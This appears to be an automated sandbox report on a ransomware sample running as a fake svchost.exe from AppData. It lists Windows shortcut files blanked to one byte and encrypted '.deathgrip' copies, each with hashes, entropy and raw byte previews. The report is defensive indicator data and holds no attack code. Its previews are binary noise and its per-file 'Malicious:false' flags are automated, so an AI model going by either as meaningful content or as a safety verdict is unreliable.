                                                          Preview:..........--t.U.@..Y........7.N..1...P4...k`.zhD...q/uT........E..eX...)~...;..=....7UR.1Dt..Csbp./....\.a..w..oG..g\.@.n.+$.."...Cw...x...3..2/d..'.(.yf.ra6....z....a7.8C..O..v.1.....u<j`@^..%Y..|.a..7.i.,..d....ps.B.-(..Jo;.....O.a.....Acr.=...)O}@onG..C.{.......*..p.\.Dq.....k`A.\....r..Q...{.w.p.....1.Ws...:>U..Ma..W.ka.2.A..I..'.V+$.I.......z@M_;/-...1.F....R.H.n...$..2..;......f.6...;.O.....d.Y..3..d.c;.(...S=...7.]..Y\2j|....z.Dz.p.X.e.RwI.S.R..XD....S..8.|.Gy7..l...>.c...`.^..E.....x.._.3.......=.c.,.....D...@.........N..F......:.C.=.x.'M>.T.P'\.U...............,.o.......}.Zux^l.|.:..A..Khvh....t.p.F..]G.uY.+.J )`K...U.<|......y.J..d.Gv...e..O...].'#<..xB..H)..,.?K.%....k...g...'.8...u...x.N....j...,q..?.]yh..#..2.S.r.o.N....zf.!.K(Q.?.O.. ......y...q..w....?..(Zf.+..+.z.z...s......}Hq.. ..@a.{..6..=.oI..-...^]...-.t........Zu.b3g...sB...I.S.XW..@.hcg...A.7.l[U.....1......8.I..=!...\..6...`..Y... ..E.....D.c.N>...x..a.|..b..PP

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.745191256421188
                                                          Encrypted:false
                                                          SSDEEP:24:UV+CYYWxiEiYqXGVobf+NzbWMZyPXISZby0R7rofDglrgPyLvjnJou3KffEQ:UV+pizXGcS/xZyPYSnHofariKWjffEQ
                                                          MD5:880A9E347ED21CDAAA9EB7EF1103364E
                                                          SHA1:D47E43C7696750B6D3B6C8F9C81C1EEBC68EA27E
                                                          SHA-256:58477F0660732DFC8536068E1A83472F736FAA9046820268D38A70018CAD27BB
                                                          SHA-512:A028CC0281B600DC40D691090BC8365F9A3F04BB77371F444B632C75AE7BC78DFB0E95DA9F0E03EC90EEE2E9A31A45F5527D8528F419676AE3B31CAC60EC8AB5
                                                          Malicious:false
                                                          Preview:..........y..l.......m..6.^.D.....!...a..!".>....0.h.V...`....a(nA.zd......]Z>.|.,..M..Q.^...J..r8....)...V.VhQd.b...Z.R.6.W..BSk..w..Q_%.gB..]y).r. ..i@.';z.V..]..mxk.".R..[...|...+wO..|.[._LN.....P.2......-x.|2j.f...?.f.q..O....m'....O.9"...B.a*]..~'......MkFg=.LEA.9.'....1....O/.x.... ....B]u.v...0.g.}....8F>X.#N...T...^...-1_.|._.....=gGp.6.....I.j./.l......M2...q..........v.r.....{.#..... ....N.+.v#.....n..8..2QK....n...4..9B_.3..sh.5.M.a_..F..>.R.;..<...Z,.E.3.....Q4a....Z...f..Wn.....0...7.4V=d.mt...r.A...c..D.<E..}e8F.`.#. I<...$.*&xq..%....].....|..l...E.M..FR......L..FR...J. .TMM..^^.>....z.%...c|...L#.l...k...G.|....P.......K...-....r.*.....:bc.X....Mwh..A,..U W.I.OqK6T$JSqf._8.J2.....\pO...Bz.e..0;.S..x.-.D3}..LL....&M.T3W..>.P.@.54u.}.$....lLH..Oa...R7{x8.;RN...>]..B..D<N.wBt......0...9z....y.@...<..Qn@#..r...,...\B9...N..........AwI.....fn.%..!f.#..v.G\W.m."....u..S.....|8.ut.P........%....4..;.q.o.t.Y!+....s.9.|...._=.)...2.3..

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1856
                                                          Entropy (8bit):7.849930948190031
                                                          Encrypted:false
                                                          SSDEEP:48:MPDCPK9i5o74eJKa2RBzs91dHWy+/9bhdDmhHUn9whY:0qK9H4eYhI7HWD9bhYh09
                                                          MD5:28493637E6F0AC25AD07A418BAA3A292
                                                          SHA1:F2B81C8734FA48150DC7076AE5D8493DA481DDBA
                                                          SHA-256:7E61D13A68DD4D48D6BC280AA4C42324A78FCB9E4CE20BC0240ACBC3E9F1AF22
                                                          SHA-512:070CA1FB46D0B424B76BC605EFD8279468DBC35325896C6756C98462A1C2460B66ABEE22BAD535AB99E0D3F96CA744792149BA88F916132547EB68B57C9FE99E
                                                          Malicious:false
                                                          Preview:.........y..........c..*..*'2..EIt-..R..........2Q9....LO`.7..tN...<...(<.P.+$=#..r.b..LG.....l...`.qe.wj..J.....#l8.Q...!.|....){S.U..d.Q.....&l.|..V,...S..+r.J."T,A.(^.a....21.|/..&~.J9...k.=.F<.3.x%.r6b...j.>.....]i.....#<y.lM....,.......w7<.r.Q...}2mds.j8I."@..5...P..a...%..+.......b..;"...C..2(X.hl..z[....j7...........OY..f,.T...\n..#..i)........&.U..|}........=.E.c}..An.=j^~?..qV.4.Y...u6..MF...l....Hc.$bd.Q.........c.......'~...yX^..3.]O..8^.]z=z\....EB.....5...UA...O.ez\*g\....!...Y...j....8.K..........<.[(.T..f.V..UV.....9.C./.h...Jhvy.......Be.F:....{P.S.p`...q>...._..F...!.g...I>%3y...tL.K,..z.....}....Z...u..$..m?....o.....t.......jh....).....]o.h.=@.tq.0U.j....u...xR.#*..#;.cxJM!....3.L.#.UN.r....5.G.w..sd...:.{e/...h.>..y......iHnv..!KH..._.W.-.@.4.j..$...A.z./..v...]..!Z.k..a[=..m..B.J......{...R..S..xl...1...r..kHV.F.I@.k\x.........'.AU..'X..jZd.EhB..kad9.......F.].8~....'..l...;}...hr.?<....(ze..Kx.$K.MCB..EH."..}../+Y

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.7305650097242715
                                                          Encrypted:false
                                                          SSDEEP:24:LuKH1q2yyWLHNhLtJLpjGiwWThtSzUlNL+M4eLoyVjjoNqz/k:L7JWbfLtNOWhtSgjJoGnYR
                                                          MD5:79AE2D2EE626D98B9A7DA4BADD8BC9BE
                                                          SHA1:584485A9249E74FBB9CBD5A83F8806157F0EB0E6
                                                          SHA-256:8189463EFE0CBB6C3F55ED12AB55C743E7A637C851244A6ECF920E15CDD34A5D
                                                          SHA-512:4D0D6AC3F584754B51FEFB7411E215F0A8236C456D5114F7B56CF25B79C008DAE5AD61F5030B5C884E50D47F2C1380B156A54D96ADE32AC16D4BFD5EDEE25942
                                                          Malicious:false
                                                          Preview:...........|.j.~s...h..N.\.Fz.Mvx&.lN..z.;Nl..{......{a.XT.Bh..7...,.Y.HT1p+WfE..'{..m'..vW.5..n...~..q@......U.R.q.F.'....`...YX. ?.J....BT.md....R......a.r.c,...<l...KuLA0...O./.\..h..t..-.............A^..{...<....s...Zt.r....p...k.2.4...=...MTu-.f..P...-...6E..7.e..~.:..*.T....C.y[.......0.~.X.tPs....5..$.}L.N..3.6Y...e.>..F2...\=..9d.?...=....f.w.o.....[.0.. #...!....Z.@.KD..F...r.w....v..........c<.....fl.t.Y.... ....^xd....[7...]0;Cf..{..b5..b.....m(Nd.b..{..j....%*..{.8.{.&.4.;....n.^...f.........X.....0.pqr...7.|..)k.G...6|..'.h....i#}.-.s....d..P.RM.p....7..A......]M.....UJ#eew.......E..(p.3.Z..y..]....6j....h..Dj.K+ej7..`.........C.Ef.gn.xd..8..{0?!....3r.U,......g./M.h.g...W.....-........./..U....Nq.sQ:.%1:b........O./.........)..f....R,...%.Y.\.TWL.J.....?..e.........!U.X@.....t...<.!...i.U.2m.4...A...].P.9.>.c..G...'m.t_...>Z{..j...\58....,r..F..t]2.\.#5l...F......l....M...j..E...x."...;..............]$.C...E.........g!.f.M...)..v

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.754621852468471
                                                          Encrypted:false
                                                          SSDEEP:24:EFISJl/P9Hn8giDNzD1Qc+czayat4QgF2gv1ja3E3Xkgl7ordQ1T2:MISJl/1XiDQ3cutFEj1P3UglAP
                                                          MD5:4B2689DD7FC162728696FEB94085E31D
                                                          SHA1:877CB1903B1AA1676B57B7C1FA3D7F6BBD4EA36B
                                                          SHA-256:FFD757B75D46036953CF69F948474EE0B37C37CC82CE60F441D5F132B2EBD0E7
                                                          SHA-512:F8CF4779CC08B93B84F973C72AE1B93450E0DAE9FA13E1DF014EABF000BAAFDB0E3AA93A9E8BEE075E3BE7C94919BA0A7B80BE6889FFE411DC6DD48667CFAA38
                                                          Malicious:false
                                                          Preview:........>V.T..G..=r.G.........N..?]?...J.A.&.-U<.uc..`BP.C...}..nW.L&).7..~.YvO.Nl.=...$.=.~...S.{.5).......#.o..?j3.yL..R.d..t..).R.u..4[.d~....9e.........b....2/.wPT....W...a.L.....{..m.y..j..[RE......m.wE..q...4r...:...2G...?..M.x..c.....~%.."k...{l...{s...'....3B).mb.9?..g..W..p..d..Sd.>{....>#B..E....<.O0..Q.ANT....o5.....(6..w9.fAK....6._r."Xr.b.v`l.......U.y..2.<..C......TN.^. .....GA.k6s.8*........n........ppsr ..B...T.7.*.....H...S...l..e.......x.t.W..}.oTI...R%.V.{8..%....s..`......6..$}..s0.......@W...k.zoD.]...M.:....ce...Hm=...^'.u...@..R...E?../...W?.('P'...}Ct....!..Q+....f.7.......>s.P........&....Z....]...0N...e.........,....$9_..5..4..%.{.("=."..A...k....P...u.,x....-.LgT;...pbIb./. ...ty..R^..S.k[..\.FK.....}3.l.x"hv...6.$.tMD........Z.irV...c._.SN!....*.x. ......)h......v .......0i.T...i.RO..ef.J........'..{....Y.A......T.,..j...v..X).Bs...D..0.OW."...o.e/Q...@....!a$.....O.~h.1...{s_.!.....Y...%%..;.[....T....

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1488
                                                          Entropy (8bit):7.755290159977447
                                                          Encrypted:false
                                                          SSDEEP:24:ghTXUx6IBAi8MceAIkDBxdiYUPIBhx/YVzpjyVsWe6HE5qao0y9cLO3my5LttL5t:ghDUGHDeAIkDEBOh1cByGWepqao0yGLG
                                                          MD5:DD0694F28A8581606BB0A3FBE6372DCB
                                                          SHA1:EF2E874CC1A2EEDD550C62316ADC2C6B0A4B5DE4
                                                          SHA-256:938AB44CFF5C450682491E00BFDD6EDBCDC253E76012191DE7B093E9BA194E87
                                                          SHA-512:711274AB86313A358C143CDDF018C5B38C6BC0BEE8CF31DDD176455968462F8B02C7FB67716F84F4F681A9DD781EF1E34C4D9AC7BD6A40E92D5657D67AA1521F
                                                          Malicious:false
                                                          Preview:........imj....bb|.7....A.JW.(...lD......v6.RF.....%v8p..+...C..^.j..E.7]7.7..\.X.../.$o..jA...N.Z......6..`Q.....:..qH...`.....to1.=.\.8..Y.....s..Xt...7d;.X....k.,..E.......)...x.B.....%..,z..........=..f(.pN.8....'..9.gP'.....?..Z=....c.....40.X...T.g..F.._I.#D$....b..LP....V.J.d.m.C...j.m_{e.r..V...a......5.J.<.&..+T.a\..]l....tlv..7..h2.{5...,ef..f.]m..w..'..J.....r<y./......Z4.IFm.L....s..L....S.7.W^\..v..V..D.....[w3.M..e..ck.M,...-.6P...p..M.g..pD....+..f...yA.(1@@s.xLt+....-....86.6.u.......#.<.......A;].O.(..........C....)...G..J.9..{.. ...d.I.<.Q..x..l.^.+k..%E\..V..s..~u.h.H..4Z.,....&.....(...ohpw.,hf]D.o.$..@....h...........w.2....+!...N.QQn.....%g..}.X.3.f...-7\6.'.....b\..~.S..3...f...U.+.{._2..2+.ps@c.G.H.Db...%....l.'.u..[9..(.&.ny2..........9S...3..C}9...5...7.s.).7".z@hFg...I....a59c.....G4.)\.}...\.og;$/<2......X"..o...J...."M.".L~........#....l....\..h.#..:.....1MBF..\........Z.45.xX...s..}..5g^...6?r.n...S...

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1424
                                                          Entropy (8bit):7.7775871875534355
                                                          Encrypted:false
                                                          SSDEEP:24:iyzSwiTxaigvAr5Z93jiyrz9EcMj7WqDxePZsvpqicWBjjbDMCFZTJrMvk1:iI6xa3vO5Z93jiQ9uuqNePD8pMMdrJ
                                                          MD5:846476C4E134173DF5802AD6D53C4FFC
                                                          SHA1:D6408BD9F70EA39A9EB4362C68333D0FFFFDFF3F
                                                          SHA-256:A8A26E7825ADEB40B4FEF36AB433E0EAABEC2E6B16C28D9B19169DFF2442BDA6
                                                          SHA-512:6FBC0073D06F406D9CC36B89A9587747D19967B70FB6956F170870E3BC8C63B461D0F8068CBB27EDD6762761ACC63F9D807CE8452285B015D63509DE142A22B7
                                                          Malicious:false
                                                          Preview:............S.ic..........P.rY..I.K........zp......:.F.*8...a&.........o.9...@..;r.0.....d.C'..Jn...v.P...{...i...[.g...iVK...m...a...[R..[..L%.T.6.D..$8._...[....q/U?..C0.s..E....ZL..+...!.b...1.J..Y;.;.+...""I. ...s.^+.._.....L.7.....]}.S..../A.p.i.^....v..'.Q.pg..N(....O`..j:.......W.2.|+.Y....I*.V G....i..+.J.M|x....S..._.".....c....~..f..@!K.@]....q[...........W......WvdE..^T...........k`..8..t5..E..S@...(..1#t.%.6.c..n..zw.e.`.FT.uT..~P..:W..._......'.r&..JE...v.Y..+~yZ..,9...._Ok.\.Eg....C..Q./.J.^.-......L].....&L?.E..<......[.&.c.C+.'........8.M....q.2..W....i....O.+._R[n......;.W...{..i..g.....FW..U.I.z.....p%n.z..e .>pC.....A............24.h.........s...\...CFm`....y..,7^...<...<.-.Q.N..2.)...+wK.^....V..'Z...#%.U8....!..=.\.....I.}........}..|aw....7o{..##....g....z_..1..(..%'.Ih..{....Q.0l2.....`.q....s6.L..fM............&Ce.t...$.6t....~.\=.%?.b:....../ .L.+Y....N..C5.PZ....+...o.*j..."......j..*...R..]....NX=....Q].l^o.P...K

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):7.778352778487553
                                                          Encrypted:false
                                                          SSDEEP:24:AmbjvYtOVEYO+tKtKITolhL8ymCvXEn91t/tjlP8IWMeDrCIjQ1X6LQUjnYww90L:RXfVxNosLTL8ymCPCrKZDrCIMZqQU8w7
                                                          MD5:A5E9982372B4D771C3EB2174B469C339
                                                          SHA1:237367F71DFB36F9EE091B6A7768E45826024419
                                                          SHA-256:D5CBB0BF38FF8419FA0317293A19219D767E54141B230EC3E687C883BFD48C52
                                                          SHA-512:E514E201FA1C0AB27F7CEC6F287C3F26EF13A195BA0DCBB7C0B5DF2A090C551ED10E35893BBB118A527BBE9EC7B534EDA599499C940DBD4DFEF1D0619B119C2A
                                                          Malicious:false
                                                          Preview:...........a...m......!z.H...'..OTf>........l.OO(.M.x...r.`.#Q..V`V.!.v..{..r.@.)...O....?.Jc...MI$.*..:.....?.a....Y...N|..|q`ns.>...].%.....-.m.0.@`t'=..oy..2...e'.}.Q..k6..J.p..!xV.B"...8.,p...|..k2!r......q[~.'K...n.b...t%T.i.k.|2....s.Zy|......d..>\? .R.R.;..`....]\..C..X...37*...D.~e.o.K.^...i.D....l..e...?|.D.\..B.n..e.s0.6.9.....z.=.F.Vt..AI.^..-o.Z...Y...~x...}.....cO..-.N..L.o.&jXV....xI.0...B...V..e.*#..bZ!......Ev...C...lh!.=...j...y.!..l.\[.X...D2..\.*f..."~T).A..._UD[K.d.),.L.P....z.r..<..MR.A.......M.<......L..n.,(.........x.~n.@,/;.hA.X.UM.r.0D......d..?FT..C..tD../.....$.........x`8}..0V....X.-.X..Af...jB`.......C.FE&0H...h...)..A...2"..bd......K.w.c0....p.......2Q_KW.....>uy......j....h(....5=.....).M.j .n.}.Xa.*........U.bmG>N...s=.\.@&.R..4.}.V..VZr=J....9"....;...HY..........".....N.C..M.0...iY..Y.f...`...\..N..5&..Z<....AZ..E..!J.../....u.(.t.....>.t}...(0...TD.U..G.O..0..0..?1.....c~..C../...,....O..4[.... !w

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.757459995382975
                                                          Encrypted:false
                                                          SSDEEP:24:wIp7k+b0xmCXW2PYMB8LjH9lLaAE/MjtxtxnVc9v4SuckigaKAm2+Y:wIFTCmMWQoP3LhRjblcepriVc2n
                                                          MD5:3664E55B3A7E5B24BAB4455C1D69374A
                                                          SHA1:FF12344B948F1593D4012257C2C0BA09E7405EBB
                                                          SHA-256:65B8ABD0E3312B53EB37230907F454B0C3FE4218AEA3CB787F5858080537CD63
                                                          SHA-512:263C8E630216B952E02FF53226C1A3A0A7897A24D499AA1AA320CB10F86EAC490C6B9FCCC9D6F420C713DE6BBE88A7617B879C46F61F2E2C3B1554B806F3EC4B
                                                          Malicious:false
                                                          Preview:........[..q.K^ti.14 ..^.....;....O........B...z.j.8...Z.G.Gw.B.......I.y....t......RG.@.v9.0}}h..tP....L.X)c"K...K.e.._A.?...|h..?zn>..rI..........c{.=l.|}*..l...qUV.`^.l..).m.AV5...G.S$T.....e.....!,."...I.~....|...:~.~+.....b0..b.l..^....j.&..^d..Y.....N.....Z!."....$EY -,..J..\3.;HW..[-[.8?6.}....`...+.Ft."Z........j.#?.y.Q..=.0.....4..)q.. Q..4..$.z....*p...L.I...K./.rI.L....+v}..Z.z..x.M.:.....`1.......i.{.4....i.v2.~.. ...........}..0cp..A..|..v`N*...\.#.....w.E>:u7ZL..3..5..b..!..vL.p.A.I.=.U$.....\.x.^.n0h..Z.=..A.7.p.V....U..L..^~pt.1.m.W.5X...=m.%._(..n..........OU.Z5.M.Y..........qr....].J.Os..6.H...1..5'.>j\......W.......]...&...ze.Q..?-.........W.*9. ?.JD}:/.PD..S...X(b..h?.."..r1..Ks.G.tO.p$....#....*..,.R]..._.<t%..d.I...M...r..'...6..oE.t.*''S.....47..L...Q..}....cV...3..j.."RU.q.3V%..6.u/..%X.1..W..(.#6p.n.....WG.^|.3~mm......*..mA_T.U.l...[V....\R.d.y.5U.%........C..?..kL...GL..%R.E.&4.S..,.f7..r.......s.i......J.0....

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.7609989423045525
                                                          Encrypted:false
                                                          SSDEEP:24:NIeTJA7O2BrlEEChiOjuiVF2xs17q9w2YPuYf66eTAdYQW12Tqr8Mx2r:+eTJAS4rlR2rMxs49w2YZCJJQW1Gqr8x
                                                          MD5:56591FB444A35E9E126D2E621BD9E43D
                                                          SHA1:E411FDD88957417FE1134674D20BF5FC671260EF
                                                          SHA-256:331CE946F01D338AB68239440C8B5F987AD80C93E05179036FDD137005D8725E
                                                          SHA-512:F32388BF02E73033B599B54B95ABCCDEDB550AD3E83487C1CB93CC8B55E41CBC8C0973B3C27EFD8D89DB6BFEA73ECAAAEDE502ADA6646FEEB8365554FB98DD15
                                                          Malicious:false
